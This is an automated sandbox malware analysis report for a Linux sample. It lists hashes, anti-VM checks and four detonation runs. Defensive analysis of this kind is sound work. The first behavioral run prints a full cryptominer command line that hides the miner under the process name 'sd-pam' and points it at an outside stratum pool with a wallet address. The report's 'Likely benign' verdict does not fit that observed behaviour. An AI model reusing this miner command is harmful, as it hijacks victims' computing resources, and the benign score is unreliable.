Malware Analysis Report

2024-10-24 21:46

Sample ID 240521-d8m6ksgc52
Target 61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
SHA256 77d533c4a4865fc909174204dd0a957fa1b79b74ad02b0a72ec313db80261087
Tags
antivm
score
4/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
4/10

SHA256

77d533c4a4865fc909174204dd0a957fa1b79b74ad02b0a72ec313db80261087

Threat Level: Likely benign

The file 61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118 was found to be: Likely benign.

Malicious Activity Summary

antivm

Checks CPU configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-21 03:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-21 03:40

Reported

2024-05-21 03:43

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/grep N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/bash.pid /tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118 N/A

Processes

/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118

[/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118]

/usr/bin/wc

[wc -l]

/usr/bin/sort

[sort -u]

/bin/grep

[grep ^core id /proc/cpuinfo]

/bin/uname

[uname -m]

/usr/bin/perl

[perl b.pl]

/tmp/h64

[./h64 -s sd-pam ./Word -a cryptonight -u 1QEVkXuQe8yN6PRHCQpxCfGQAFwTXBXxJj -o stratum+tcp://163.172.18.134:8080 -p x:[email protected] -k -B -l Word.txt --donate-level=1]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.15:443 tcp

Files

/tmp/bash.pid

MD5 94f95cdbde2a1f83e642c708096500d0
SHA1 a59ac422b60f8a6841bd649fe1f8fd5588dc6a9b
SHA256 aef8505db2d1dea920d252288be2138f3cbbd4a72e1e29b08b875a7708288107
SHA512 e17531c92c55c2ef939a8ed8e3a573f50583326ba86bd4b3c65150b4ecfb66b3ed2ba489e60f7bbe4af0d3a057075ad1952acdb93482975167a6682096a4b699

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 03:40

Reported

2024-05-21 03:43

Platform

debian9-armhf-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-21 03:40

Reported

2024-05-21 03:40

Platform

debian9-mipsbe-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-21 03:40

Reported

2024-05-21 03:41

Platform

debian9-mipsel-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A